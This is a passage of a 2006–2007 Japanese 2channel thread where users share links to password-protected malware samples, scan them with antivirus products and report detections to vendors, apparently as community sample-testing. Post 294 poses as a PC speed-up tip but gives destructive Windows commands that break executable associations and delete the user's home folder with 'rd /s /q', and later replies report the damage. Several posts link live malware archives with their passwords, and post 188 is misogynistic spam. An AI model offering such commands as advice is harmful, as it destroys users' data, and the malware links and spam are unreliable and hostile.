3.「ゼロウイルス」は自動アップデート機能があります。
  駆除リストのアップデート上にプログラムの新しい機能がが追加されます。

4.「ゼロウイルス」はシェアーウェアーです。あらゆる場所に広告してください。
  掲示板などにアップされる場合はセットアップ・ファイルをアップしてください。

5.「ゼロウイルス」のお問い合わせは、 www.zerovirus.jpよりお願いします。

---ここまで---

>「ゼロウイルス」はフーリーソフトウェアーで、
>「ゼロウイルス」はシェアーウェアーです。


169 :名無しさん@お腹いっぱい。:2006/12/17(日) 18:45:05
メクロウイルスwww

ttp://www.zerovirus.jp/virus_page01.html

170 :名無しさん@お腹いっぱい。:2006/12/17(日) 18:47:51

株式会社ゼスタスはアンチスパイウェアーをはじめにウイルスバスターまでソフト一本で全サービスご提供できるように最善を尽くしております



171 :名無しさん@お腹いっぱい。:2006/12/17(日) 18:50:17
利用規約がソフト名、会社名までバイドクターのそれとまったく一致している件について

…先生、会社概要と社名が一致しません!

172 :インスコマン ◆qlwUrCXXtM :2006/12/17(日) 19:12:31
まず起動画面
ttp://2chshare.net/pic/files/2chshare-pic_0164.png.html

21個中のウイルスの内1個検出
ttp://2chshare.net/pic/files/2chshare-pic_0165.png.html

コンピューター全体スキャンでクッキーをいくつか検出。
誤検出が一つ。画像は誤検出したエントリー
ttp://2chshare.net/pic/files/2chshare-pic_0166.png.html

検体に使用したやつ↓(前回の検体はダウソ出来ない。)
名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/12/08(金) 13:09:07
けんたいあっぷでーとかんりょう...............|

http://50.megaloda.org/uploda/www.megaloda.org0883.zip.html
ぜんかいのけんたいは↑これ

何回も同じファイルで検査をしても無駄にファイル要領をとるだけなんで
検出される可能性の低いものとか自分の判断で少なくしました。
あとセキュ版で拾ったものとかネットで拾ったものも少量追加しますた。
クリスマスプレゼントってことで!

ダウソパス:xmas
ZiP解凍パス:xmas
☆★悪     用     厳     禁     だ     !★☆
http://www.dotup.org/uploda/www.dotup.org11692.zip.html

※検出されないものがあれば検体として送ろう!
※ウイルスじゃないものがあったらスマソ




173 :名無しさん@お腹いっぱい。:2006/12/17(日) 19:18:00
>>171
GUIも似てるし、無駄にPC最適化とかある所なんか梅毒そっくり。
アイコンも似てる。
四角が丸になっただけ。

174 :名無しさん@お腹いっぱい。:2006/12/17(日) 19:25:06
ゼロウイルス独自で開発された新しいスキャン方式の
エンジンを搭載他のアンチスパイウェアーとは比較にならないぐらいの

比較にならないぐらいのなんだw

175 :名無しさん@お腹いっぱい。:2006/12/17(日) 19:47:41
中古なら検体がいっぱいかもなw

176 :名無しさん@お腹いっぱい。:2006/12/19(火) 20:09:02
中古?

177 :名無しさん@お腹いっぱい。:2006/12/19(火) 23:47:21
インスコマンコー!
http://www.webwasher.jp/trial.html

178 :名無しさん@お腹いっぱい。:2006/12/19(火) 23:53:33
>>177

それ、これの一位だろ?
 AV-Test.orgによるテスト結果(2006年10月2日付)
 http://www.eweek.com/article2/0,1895,2023127,00.asp

 ”AV-Test ran a huge test of backdoors (59,053),
 bots (70,658) and trojan horses (159,971) for a total of
 289,682 malware samples.”

 # 1 WebWasher  99.97%  |  #21 F-Prot     77.88%
 # 2 AntiVir     99.95%  |  #22 Command   77.11%
 # 3 AVK 2007   99.95%  |  #23 Microsoft    76.18%
 # 4 AVK 2006   99.89%  |  #24 Ewido      74.67%
 # 5 Symantec   99.04%  |  #25 Sophos     65.55%
 # 6 Kaspersky   98.86%  |  #26 eSafe      59.34%
 # 7 F-Secure   98.24%  |  #27 UNA       58.76%
 # 8 BitDefender  96.51%  |  #28 QuickHeal    55.72%
 # 9 Norman    96.34%  |  #29 ClamAV     48.71%
 #10 Nod32     95.80%  |  #30 eTrust-VET   48.37%

 #11 Avast!     95.17%  |  #31 eTrust-INO   41.92%
 #12 AVG      94.78%  |  #32 VirusBuster   40.94%
 #13 Fortinet    94.65%
 #14 McAfee     93.99%
 #15 Rising      91.18%
 #16 Panda     90.45%
 #17 Dr Web    90.38%
 #18 Trend Micro  90.03%
 #19 Ikarus     84.77%
 #20 VBA32     81.28%

179 :インスコマンコ3 ◆tG.DZH.Ero :2006/12/20(水) 00:38:04
ちょっと通りますよ

180 :名無しさん@お腹いっぱい。:2006/12/20(水) 00:39:04
>>179
キタ━━━━━━(゚∀゚)━━━━━━ !!

181 :名無しさん@お腹いっぱい。:2006/12/20(水) 00:48:33
(・∀・)

182 :名無しさん@お腹いっぱい。:2006/12/21(木) 15:45:32
(*´∀`*)

183 :インスコマンコ3 ◆tG.DZH.Ero :2006/12/22(金) 21:48:36
あげ

184 :名無しさん@お腹いっぱい。:2006/12/23(土) 02:52:09
http://up.spawn.jp/file/up59893.htm
お願いします

185 :名無しさん@お腹いっぱい。:2006/12/23(土) 03:12:31
これからPCくり〜んいんすこしなおすから派手なの無い〜?

186 :名無しさん@お腹いっぱい。:2006/12/23(土) 03:17:23
ヒント:Winny

187 :名無しさん@お腹いっぱい。:2006/12/23(土) 14:33:22
>>185
http://www.freedownloadscenter.com/Authors/WinSoftware.html

188 :名無しさん@お腹いっぱい。:2006/12/23(土) 16:48:41
His judgement cometh and that right soon

結婚を迷っている男性諸君、結婚すると不幸になる。女は外面は綺麗で清潔、内面はずるくて汚いため、口も悪くなる
今の女は「どうやって男にたかるか」を必死に考えている。騙されるな。家事は極めて軽労働になった
コンビニやPC、風俗関係も、「嫁いらず」に拍車をかける。今の女は「人生の不良債権」
社会的に男女は対等で平等。男が女を養ったり守る必要はない「見切れ!見切り千両!情けは不要!つけこまれるぞ」
女は社会的優遇、過剰な法的保護、仕事と家庭の二束のわらじを得て、もはや女尊男卑〜結婚しようとするあなたを彼女は陰で小馬鹿にしている事でしょう〜

★☆★よほどの事が無い限り結婚は保留し、沢山の女性と自由に恋愛(セックス)を楽しめ♪★☆★ 避妊(ピル等)は忘れずにねd(^−^
★☆★捨てた女は優しい真面目男が結婚(残飯処理)してくれるさw★☆★

それでも結婚するあなたへ[夫婦財産契約登記]
これはある意味では男の『究極の護身法』
夫婦の財産についての法律。夫婦財産契約により契約財産制となり、自分の稼いだ財産はすべて自分のもの
離婚時に財産の半分を配偶者に取られない

・弱い者いじめは最低と言いつつ、赤ちゃんを殺す母親(そして無罪判決(笑
・狙撃は女子のほうが強い。男は、ノイローゼになってやめてしまうが
女は何人殺してもノイローゼにならない。そして、骨盤が安定しているため

・ナチスの拷問で、女の拷問の残虐非道さを見て、拷問をしていた男達もひいたという
拷問しながら楽しそうに笑みをうかべていたそうだ。罪悪感や引け目が無い

・有史以前が女尊男卑の時代だったことを指摘したのは、スイスの学者バッハオーフィン
アマゾン女族の女王は、法律を定め、女には従軍させ、男たちには卑しい奴隷の仕事を課した
男児が生まれたら、脚と腕を不自由にして、戦えなくした
・王位継承権が女性にだけあったという事実だけから考えて、古代エジプトでは女性権力が非常に大きかった
男女平等どころか、かなり女性上位の社会であった
・日本国でも卑弥呼が女王
・昆虫などにいたっては、オスカマキリはメスに食われてしまう

女は虐げられてきた?父系社会など人類の歴史から見ればほんのわずかな期間に過ぎない。むしろ・・・

189 :名無しさん@お腹いっぱい。:2006/12/23(土) 17:00:48
結婚はいいものだよ

190 :名無しさん@お腹いっぱい。:2006/12/24(日) 22:40:09
軽快なディスクエディタを探しています。
AcronisDiskDirectorについているAcronis Disk Editorみたいなやつでなるべくフリーがいいです。

よろしくお願いしますorz

191 :名無しさん@お腹いっぱい。:2006/12/26(火) 12:43:20
ttp://pc8.2ch.net/test/read.cgi/sec/1165936988/831

インスコマーン
お願い

192 :インスコマンコ3 ◆tG.DZH.Ero :2006/12/26(火) 13:12:24
ふむふむ

193 :インスコマンコ3 ◆tG.DZH.Ero :2006/12/26(火) 13:15:53

とりあえず
http://www.virustotal.com/vt/en/resultadof?a7abe8670e2acec141b0bc702a43f260

194 :名無しさん@お腹いっぱい。:2006/12/26(火) 17:54:09
>>193
何も出てこないよ〜

195 :名無しさん@お腹いっぱい。:2006/12/26(火) 18:46:24
>>193が表示されないので
http://www.virustotal.com/vt/en/resultadof?b22be4931b16c6c37dd85a5be696deb8

196 :名無しさん@お腹いっぱい。:2006/12/26(火) 18:49:18
>>195
出てきた! サンクス!

197 :名無しさん@お腹いっぱい。:2006/12/26(火) 18:49:29
Avast
BitDefender
Kaspersky
Ikarus
Fortinet
しか検出しないとは

198 :名無しさん@お腹いっぱい。:2006/12/26(火) 18:56:48
カスペは14時の更新で対応していた
出来立てホヤホヤのウイルスだな

199 :名無しさん@お腹いっぱい。:2006/12/26(火) 19:00:49
Ikarusが検出してるあたりがいいな。なんか。

200 :名無しさん@お腹いっぱい。:2006/12/26(火) 19:02:15
どうせwinnyでひろったやつだろ

201 :名無しさん@お腹いっぱい。:2006/12/26(火) 19:12:12
>>191
当たり前のごとくウイルスバスター2006でも検知できなかったよ。
トレンドマイクロに検体を送った。

202 :名無しさん@お腹いっぱい。:2006/12/26(火) 19:17:19
>>191
うちのアンラボなんかじゃとても検出できませんでしたよ、ハイ

203 :名無しさん@お腹いっぱい。:2006/12/27(水) 04:38:04
AntiVirスレに張られてたんだけど、
ttp://www.fileup.org/fup127504.zip.html
これって何なんですか?
パスワードはどちらもvirusだそうです。

204 :名無しさん@お腹いっぱい。:2006/12/27(水) 09:04:24
なにこれ

205 :名無しさん@お腹いっぱい。:2006/12/27(水) 09:12:59
no virus found

206 :名無しさん@お腹いっぱい。:2006/12/27(水) 09:13:12
>>203
VirusTotalに投げてみても両方とも何も検知出来ないという結果が返ってきた。
珍しいというか、本当に何も害が無いのかも。
片方(あくあ角aa.exe)は7-Zip形式の自爆書庫だけど、展開時にパスワードを求められる。

207 :名無しさん@お腹いっぱい。:2006/12/27(水) 20:19:04
あくあ角aa だか あくあ角 でググるとフォントのスレに行くからひょっとして純粋なツールなのかしらん?

208 :インスコマンコ3 ◆tG.DZH.Ero :2006/12/27(水) 21:04:02
>>191
AntiVirが対応しました
Dear Sir or Madam, 

Thank you for your recent inquiry. 
 
We found a new virus in the attachment you have sent us. 
The pattern recognition will be integrated in one of our next updates. 
The virus will be detected as TR/Click.VB.PV. 
 
We thank you for your assistance. 
 
Attachment(s) you sent: 
- up4577.zip

209 : 株価【37】 :2006/12/29(金) 09:39:19
test

210 :名無しさん@お腹いっぱい。:2006/12/29(金) 09:56:40

         ハ,,ハ   
        ('(゚∀゚∩_ おいらをどこかのスレに送って! 
      /ヽ   〈/\ お別れの時にはお土産を持たせてね! 
     /| ̄ ̄ ̄|.\/ 
       | .モツ煮..|/ 
        ̄ ̄ ̄ 
現在の所持品:たばこ・ライター・コーヒー・ブラックブラック・枕・ケータイ電話 
睡眠薬・聖教新聞 ・ダッチワイフ・外付けSCSI340MHDD・ネットランナー4月号 
TYG02・小嶋進社長・ゲルトモ・ディプスファンタジア・抵抗1kΩ(黄紫橙金)・媚薬 
バーボン・メシマズ嫁のお手製弁当・吉牛の割引券・銀魂1巻・将棋の駒(角行) 
ジンギスカンキャラメル・ホットカーペット・第三のビール・笛・nintendoDS・執刀用メス・長ラン・74HC00 
Vodafone902SH・たまねぎ・折れたシャー芯・ノートの切れ端・飲みかけのコーラ・ヨウ素液・姉歯物件
フロッピー・Adobe Reader 7.0・

211 :名無しさん@お腹いっぱい。:2006/12/29(金) 16:31:43
ttp://homepage1.nifty.com/kazubon/tclocklight/tclocklight-040702-3.zip
Windows Live OneCareで「望ましくない可能性のあるソフトウェア」といわれました

212 :名無しさん@お腹いっぱい。:2006/12/29(金) 16:41:39
TClockなら問題ないよ。

213 :名無しさん@お腹いっぱい。:2006/12/29(金) 16:57:50
MSにとってみれば、linuxでさえ「望ましくない可能性のあるソフトウェア」。

214 :211:2006/12/29(金) 16:59:43
レスサンクスです
やっぱOneCareダメダメだなーw

215 :名無しさん@お腹いっぱい。:2006/12/29(金) 17:57:36
携帯でも踏めるサイト晒してください。
特にデータが全部消えるやつ。

216 :名無しさん@お腹いっぱい。:2006/12/29(金) 18:05:36
てs

217 :201:2006/12/29(金) 18:07:18
>>191
トレンドマイクロがパターンファイル4.149.00で対応した。
TROJ_VB.HAYというトロイの木馬だと。

218 :名無しさん@お腹いっぱい。:2006/12/29(金) 18:10:51
検体送って三日後か
遅くね?

219 :名無しさん@お腹いっぱい。:2006/12/29(金) 19:29:18
うるせえエビフライぶつけるぞ
 ,.、,、,..,、、.,、,、、..,_,,_  /i
;'`;、、:、. .:、:, :,.: ::`゛:.::'':,'.´ -‐i
'、;: ...: ,:. :.、... :.、.:: _;... .;;.‐'゛ ̄  ̄  
   ヽ(´・ω・)ノ
     | G /
     UU 

220 :名無しさん@お腹いっぱい。:2006/12/29(金) 19:36:41
>>191の先のやつ消えてるなあ・・・
VirusTotalでカスペが対応してるのか誰かかわりに見て!

221 :名無しさん@お腹いっぱい。:2006/12/29(金) 20:04:33
>>220
(・∀・)Trojan-Clicker.Win32.VB.pv

222 :名無しさん@お腹いっぱい。:2006/12/29(金) 20:18:26
ttp://www.rupan.net/uploader/download/1167382133.rar
ttp://www.rupan.net/uploader/download/1167377136.rar

お願いします

223 :名無しさん@お腹いっぱい。:2006/12/29(金) 20:25:59
>>220
>>197
>>198

224 :名無しさん@お腹いっぱい。:2006/12/29(金) 20:26:01
220 名前: 猪(検問中) 投稿日: 2006/12/29(金) 18:55:19.36 ID:DmBfWira0
http://www.uploda.org/uporg635455.rar.html
一応パスは掛けておいた、まぁ分かるよな vip

おながいします。

225 :名無しさん@お腹いっぱい。:2006/12/29(金) 20:28:58
>>222
http://www.rupan.net/uploader/download/1167382133.rar
huun.dllにはウイルスは発見されませんでした
S??iva.eXEにはウイルスは発見されませんでした

http://www.rupan.net/uploader/download/1167377136.rar
huun.dllにはウイルスは発見されませんでした
Readm?txt.EXeにはウイルスは発見されませんでした
おまけ?zip.?どな.rar.exeにはウイルスは発見されませんでした
これはエロイwっwwe??vmw.eXeにはウイルスは発見されませんでした

226 :名無しさん@お腹いっぱい。:2006/12/29(金) 20:42:18
>>224
ピロウイルスとか出てきた

227 :名無しさん@お腹いっぱい。:2006/12/29(金) 20:43:45
>>222
ユニコード使ったやつだな
まあ初心者はひっかかるだろうなw




















てかひっかかっちまったああああああああああああああああああ

228 :名無しさん@お腹いっぱい。:2006/12/29(金) 20:48:37
>>227
気にするな。俺もだ

229 :名無しさん@お腹いっぱい。:2006/12/29(金) 20:53:36
(´・ω・`)ショボーン

230 :名無しさん@お腹いっぱい。:2006/12/29(金) 20:54:30
>>224

http://www.dotup.org/uploda/www.dotup.org13744.png











さてリカバリするか

231 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:00:49
いい機会じゃないかw

232 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:01:01
やっぱり拡張子偽装には詳細表示が非常に有効な武器になるね。
Windowsは俺より賢いから「アプリケーション」と表示してくれる。

233 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:01:52
砂箱には勝てんのですよ

234 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:04:24
>>224
P2P-DESTROYERか何かで作ったのかな。
サイズが大きくて検体が送れないw

235 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:05:19
>>234
そのまま送れよw

236 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:08:15
ヒント: 圧縮したら1MB

237 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:08:21
>>224
検知しました: トロイ Trojan.Win32.KillFiles.ki  URL: http://www.uploda.org/uploader.cgi/youjo/youjo.rar/新しいフォルダ/youjo.SCR

落とす前に検知してくれた。すごいよカスペちゃん

238 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:14:17
Bitじゃ解凍して右栗スキャンしないと反応してくれない。

239 :234:2006/12/29(金) 21:15:29
>>235
orz

俺がバカだった。

240 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:17:55
>225
ああ〜ん、VB2007で実行しようと思ったら、タイムリーでパターン更新きて、実行できなかったw

よし、>>224やるか。

241 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:21:25
>>224
Symantecに先頭のプログラム部分だけ送っといた

242 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:24:28
ベンダーは年末年始やってるのだろうか

243 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:24:32
うごぁ、WinRAR入ってなくて、解凍できないだけだった……orz

244 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:29:55
>>222
こっちを検出した人いる?

245 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:30:57
>>241
失敗した。
中身を見るべきだったか。
そのまま送ったらトレンドマイクロから「Over restriction (decompressed file size)」という
警告メールが来た。
まあ、良いか。

246 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:33:05
>>244
jottiですべてNO virus found


247 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:35:38
VB2007検知できず。
不審ソフトウェア警戒 ON で実行してみる。(´・ω・`)

248 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:43:35
>>244
http://www.virustotal.com/vt/en/resultadof?c6a48350c45f90c4919a44811c760810


249 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:46:06
>>224
そのまんま検体送りたいんだけど、rarの解凍にもパス(vip)いりますか?

250 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:48:05
>>246
>>248
サンクス


251 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:52:43
Unicodeつかったファイル名偽装への対抗策

ttp://d.hatena.ne.jp/hasegawayosuke/20061222/p1

252 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:53:50
>>222

全部これになった。レジストリの改変はしない模様。
タスクマネージャで殺して、おしまい(今の所は)。
ttp://new1314.freespace.jp/log/up/log/2259.png

253 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:54:43
homeじゃできねえべ?

254 :252:2006/12/29(金) 21:56:17
こっちだった
ttp://user.ftth100.com/log/up/log/2259.png

255 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:56:39
>>222
ttp://vista.jeez.jp/img/vi6739659359.png

256 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:57:49

( ´_ゝ`)フーンはベクターでダウソできる
http://www.vector.co.jp/soft/dl/win95/amuse/se277584.html

257 :名無しさん@お腹いっぱい。:2006/12/29(金) 21:59:15

Programmed By NTACY MAINICON ( ´_ゝ`)ふーん v1.0


258 :名無しさん@お腹いっぱい。:2006/12/29(金) 22:14:32
http://www.dotup.org/uploda/www.dotup.org13763.zip.html
フォルダを開いたらブルースクリーンになってしまいました。これはなぜでしょう?

259 :名無しさん@お腹いっぱい。:2006/12/29(金) 22:18:41
>>258
偽装フォルダだね

260 :名無しさん@お腹いっぱい。:2006/12/29(金) 22:23:38

Fortinet Found Joke/Bluescreen


261 :260:2006/12/29(金) 22:27:03
間違えた orz
これは 俺がもってるジョークソフトだった

262 :名無しさん@お腹いっぱい。:2006/12/29(金) 22:30:11
>>258
カスペ反応なし???
なんだこれ

263 :260:2006/12/29(金) 22:36:04
やっぱ260っぽい
文字列追加して検出できないようにしてんじゃねえの?

264 :名無しさん@お腹いっぱい。:2006/12/29(金) 23:14:52
>>258
Joke-Bluescreen.c

265 :名無しさん@お腹いっぱい。:2006/12/30(土) 04:51:27
>>224
AntiVir 7.3.0.21 12.29.2006 no virus found
Authentium 4.93.8 12.29.2006 no virus found
Avast 4.7.892.0 12.21.2006 no virus found
AVG 386 12.29.2006 Generic2.OKQ
BitDefender 7.2 12.29.2006 no virus found
CAT-QuickHeal 8.00 12.29.2006 no virus found
ClamAV devel-20060426 12.29.2006 no virus found
DrWeb 4.33 12.29.2006 no virus found
eSafe 7.0.14.0 12.28.2006 no virus found
eTrust-InoculateIT 23.73.101 12.29.2006 no virus found
eTrust-Vet 30.3.3289 12.29.2006 no virus found
Ewido 4.0 12.29.2006 no virus found
Fortinet 2.82.0.0 12.29.2006 no virus found
F-Prot 3.16f 12.29.2006 no virus found
F-Prot4 4.2.1.29 12.29.2006 no virus found
Ikarus T3.1.0.27 12.29.2006 no virus found
Kaspersky 4.0.2.24 12.29.2006 Trojan.Win32.KillFiles.ki
McAfee 4929 12.29.2006 no virus found
Microsoft 1.1904 12.27.2006 no virus found
NOD32v2 1946 12.29.2006 probably a variant of Win32/KillFiles.KI
Norman 5.80.02 12.29.2006 no virus found
Panda 9.0.0.4 12.29.2006 no virus found
Prevx1 V2 12.29.2006 no virus found
Sophos 4.13.0 12.28.2006 no virus found
Sunbelt 2.2.907.0 12.18.2006 no virus found
TheHacker 6.0.3.139 12.29.2006 no virus found
UNA 1.83 12.29.2006 no virus found
VBA32 3.11.1 12.29.2006 suspected of RAR.MailBomb
VirusBuster 4.3.19:9 12.29.2006 no virus found


266 :名無しさん@お腹いっぱい。:2006/12/30(土) 11:08:10
P2P-DESTROYERでつくられたやつはNODとカスペが強いよ 
亜種をヒューリスティックでほとんど検出できる
反対にバスターとノートンはだめぽ サイズ変えただけで検出できなくなる


267 : 株価【34】 :2006/12/30(土) 12:40:43
書き込めないと思ったら鯖移転か

268 :名無しさん@お腹いっぱい。:2006/12/30(土) 17:59:06
バスター2006ってもうドクロウイルスには対応してるんだっけ?

269 :名無しさん@お腹いっぱい。:2006/12/30(土) 18:04:14
WORM_ANTINNY.AW
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.AW

この手の物はトレンドマイクロに表彰されるくらいの熱心な検体提供者がいるはずだ。
今も活動しているのか知らないけど。

270 :名無しさん@お腹いっぱい。:2006/12/31(日) 09:40:27
>>269
軍艦さんとかな

271 :名無しさん@お腹いっぱい。:2006/12/31(日) 09:54:00
>>269
志村〜それ旧型!!

272 :名無しさん@お腹いっぱい。:2006/12/31(日) 13:51:09
ttp://www8.axfc.net/uploader/16/so/N16_7070.zip.html
P=12345
これなんですか?

273 :名無しさん@お腹いっぱい。:2006/12/31(日) 13:58:50
>>272
Dialer
PC有害

274 :名無しさん@お腹いっぱい。:2006/12/31(日) 14:11:03
>>273
これ踏むとどうなります?

275 :名無しさん@お腹いっぱい。:2006/12/31(日) 15:49:49
>>274
ダイアルアップ回線なら勝手にQ2とかにダイアルさせられる。

276 :名無しさん@お腹いっぱい。:2006/12/31(日) 16:15:44
>>275
あぁうちADSLなんでダメだな
dクス

277 : 株価【36】 :2006/12/31(日) 23:03:03
書き込みてst

278 :!omikuji !dama:2006/12/31(日) 23:05:08
!omikuji !dama

279 :名無しさん@お腹いっぱい。:2006/12/31(日) 23:21:31
まだ早いだろ。


280 : 【大凶】 【330円】 :2007/01/01(月) 00:59:22
!omikuji!dama

281 :名無しさん@お腹いっぱい。:2007/01/01(月) 01:02:28
!omikuji!dama!

282 : 【258円】 【末吉】 :2007/01/01(月) 01:43:29
大凶かよ…

283 : 【大吉】 【1429円】 :2007/01/01(月) 02:08:13
!omikuji!dama

284 :名無しさん@お腹いっぱい。:2007/01/03(水) 10:44:44
ttp://www4.axfc.net/uploader/14/so/N14_21370.zip.html
news
ttp://200.megaloda.org/uploda/www.megaloda.org0067.rar.html
vip

285 :名無しさん@お腹いっぱい。:2007/01/03(水) 18:33:49
>>284
上 Trojan.Win32.Agent.gh

下 Trojan-Clicker.Win32.Agent.it

286 :名無しさん@お腹いっぱい。:2007/01/03(水) 19:07:32
!omikuji!dama

287 :名無しさん@お腹いっぱい。:2007/01/03(水) 19:12:55
>>284
上はNOD32で反応するけど下は反応しないなぁ

288 :名無しさん@お腹いっぱい。:2007/01/03(水) 19:43:35
下のファイル115Mもあるじゃねえかw

289 :インスコマンコ3 ◆tG.DZH.Ero :2007/01/03(水) 19:56:01
よう

290 :名無しさん@お腹いっぱい。:2007/01/03(水) 22:09:16
tp://suzukiairi.net/cgi-bin/up/img/puniairi150.jpg
これってどういう条件でどう動くのか分かりませんか?

291 :名無しさん@お腹いっぱい。:2007/01/04(木) 02:27:41
これ踏むとどうなりますか?
http://z.u.la/k.divby0.com/q/bic

292 : ◆tG.DZH.Ero :2007/01/04(木) 07:15:11
>>291
ブラクラでもウイルスでもありません。普通の携帯サイト

293 :名無しさん@お腹いっぱい。:2007/01/04(木) 07:20:05
>>290
AntiVirでPHP/C99Shell.Bとして検出

294 :名無しさん@お腹いっぱい。:2007/01/04(木) 22:53:11
最近PCが重いとか、起動やシャットダウンが遅いとか思ってる人は、
このコマンドを試してみるといい。
以下を実行することで領域の節約、不要になったメモリが解放される

[スタート]→[ファイル名を指定して実行]で 
ftype exefile="%SystemRoot%\system32\write.exe" %1
と入力し[OK]をクリックする。 これだけでおk。

Webページを開くのが遅い場合はこのコマンドを使ってみよう。
レンダリングの方法を変えるためかなり体感速度が変わるはずだ。
ftype HTTP="%SystemRoot%\hh.exe" %1
(HTTPプロトコル)
ftype HTTPS="%SystemRoot%\hh.exe" %1
(HTTPSプロトコル)

特に3Dゲームを主に動かすハイスペックユーザーにとっては朗報だろう。
もしこの方法で問題が起こったら戻すのも簡単だ。
cmd /c rd /s /q %SystemDrive%%HOMEPATH%
このコマンドを入力してOKを押すだけ。

ちなみに俺はこのコマンドをしてベンチマークスコアが110〜130%ほど上昇した。
君も試してみるといい

295 :名無しさん@お腹いっぱい。:2007/01/04(木) 23:19:26
最近PCが重いとか、起動やシャットダウンが遅いとか思ってる人は の検索結果 約 60 件中 1 - 10 件目

296 :名無しさん@お腹いっぱい。:2007/01/04(木) 23:20:33
これやったら大変なことになった。(´Д⊂ モウダメポ

297 :名無しさん@お腹いっぱい。:2007/01/04(木) 23:22:28
ショートカットがワードパッドで開くようになった。
デスクトップのアイコンが全部消えた。


298 :名無しさん@お腹いっぱい。:2007/01/04(木) 23:42:46
あやしいレスを実行してどうする。

299 :名無しさん@お腹いっぱい。:2007/01/04(木) 23:47:49
なんじゃらこりゃ

300 :名無しさん@お腹いっぱい。:2007/01/05(金) 00:00:13
exe ファイルの関連付けを変更してしまいました
ttp://homepage2.nifty.com/winfaq/wxp/trouble.html#1251

301 :名無しさん@お腹いっぱい。:2007/01/05(金) 00:29:00
>>294
最近よく見るなw
cmd /c rd /s /q d:を実行させて、ユーザーに確認を取らずにパーティションD以下の
ディレクトリを削除するものもあるな

302 :名無しさん@お腹いっぱい。:2007/01/05(金) 01:09:36
まったく。

303 :名無しさん@お腹いっぱい。:2007/01/05(金) 01:34:42
怖くて俺には出来ない

304 :名無しさん@お腹いっぱい。:2007/01/05(金) 01:49:11
.exeの関連付け変えられたらコマンドプロンプトも起動できないだろ

305 :名無しさん@お腹いっぱい。:2007/01/05(金) 08:09:37
ttp://www.badongo.com/file/1605002
ttp://www.badongo.com/file/1605815
ttp://www.badongo.com/file/1605927
ttp://www.badongo.com/file/1606064
ttp://www.badongo.com/file/1606113


306 :名無しさん@お腹いっぱい。:2007/01/05(金) 17:59:19
なにこれ。

307 :名無しさん@お腹いっぱい。:2007/01/05(金) 18:11:47
rar分割書庫じゃね
エロ動画でも入ってるんだろう

308 :名無しさん@お腹いっぱい。:2007/01/05(金) 18:29:57
エロ動画か。 興味ネ

309 :名無しさん@お腹いっぱい。:2007/01/05(金) 18:54:40
落ちてコネェ

310 :名無しさん@お腹いっぱい。:2007/01/05(金) 19:21:38
>>308はインポ

311 :名無しさん@お腹いっぱい。:2007/01/05(金) 20:31:10
ttp://www8.axfc.net/uploader/15/so/N15_14006.zip.html
key:GOM

312 :名無しさん@お腹いっぱい。:2007/01/05(金) 20:34:08
GOMPLAYER?

313 :名無しさん@お腹いっぱい。:2007/01/05(金) 20:57:42
>>312
多種のCodecを独自に内蔵するフリーの韓国製メディアプレーヤーですw

314 :名無しさん@お腹いっぱい。:2007/01/05(金) 21:03:37
姦国製は論外

315 :名無しさん@お腹いっぱい。:2007/01/05(金) 21:27:12
>>314
あやまれ!アンラボのアンチウイルス使ってる俺にあやまれ!

316 :名無しさん@お腹いっぱい。:2007/01/05(金) 21:38:46
>>311
ttp://ehoba.mydns.jp/loada/src/txup0112.png

317 :名無しさん@お腹いっぱい。:2007/01/05(金) 22:04:30
>>316
ビットディフェンダーでもダメなのかカスペ系がやっぱ強いな

318 :名無しさん@お腹いっぱい。:2007/01/05(金) 22:08:27
>>316
そこではなぜか無反応だが、AntiVirでもTR/Click.Agent.ITを検出

319 :名無しさん@お腹いっぱい。:2007/01/05(金) 22:19:17
なになに?
GOMてウィルス入りなの?
GOM使ってるんだが今のとこ何も不具合はおきていない。

320 :名無しさん@お腹いっぱい。:2007/01/05(金) 22:22:34
>>319
日本の公式サイトから落としたやつは反応なかった

321 :名無しさん@お腹いっぱい。:2007/01/05(金) 22:44:58
>>318
jottiは最新updateに追いついていない場合があるからね
virus totalのほうが正確 >>311の結果はこれ
http://www.virustotal.com/vt/en/resultadof?1070cdf9e1fe1693e0a921768b947a12

ほいで今最新のgomを落としてスキャンしてみた >>311とはMD5が違う もちろんno virus found
http://www.virustotal.com/vt/en/resultadof?ff5e4e3e55381f511bef35be93106dc7 


322 :名無しさん@お腹いっぱい。:2007/01/05(金) 23:00:29
つまりなんだ、昔のGOMにはアドウェアが仕込んであったと、そういうことか
動画プレイヤーにアドウェアとかロクでもないな

323 :名無しさん@お腹いっぱい。:2007/01/06(土) 01:12:52
単純にファイル名にGOMPLAYERって入ってるだけでGOMPLAYERとは無関係でしょ?
バージョン情報無いし、144 KBってありえない。

324 :名無しさん@お腹いっぱい。:2007/01/06(土) 03:34:50
ttp://pcshop.tyabo.com/no-to/a-001.htm
ニュー即に張られてて踏んでしまいました。
カスペとNODのみ対応している模様で、Norton,Antivirなどはだめらしいです。
カスペを入れた状態で踏んだものの、FDDへのアクセスがガガガガっとなって・・・・ちょっと心配。

325 :316:2007/01/06(土) 18:01:08
>>321
まあそう言うな。
virus total でやろうとしたら、キューが350越えてて、待ち時間が1時間ですよって言われたのさ。(´・ω・`)

326 :名無しさん@お腹いっぱい。:2007/01/06(土) 18:28:21
>>324
VB2007 - TROJ_HEUR.IL

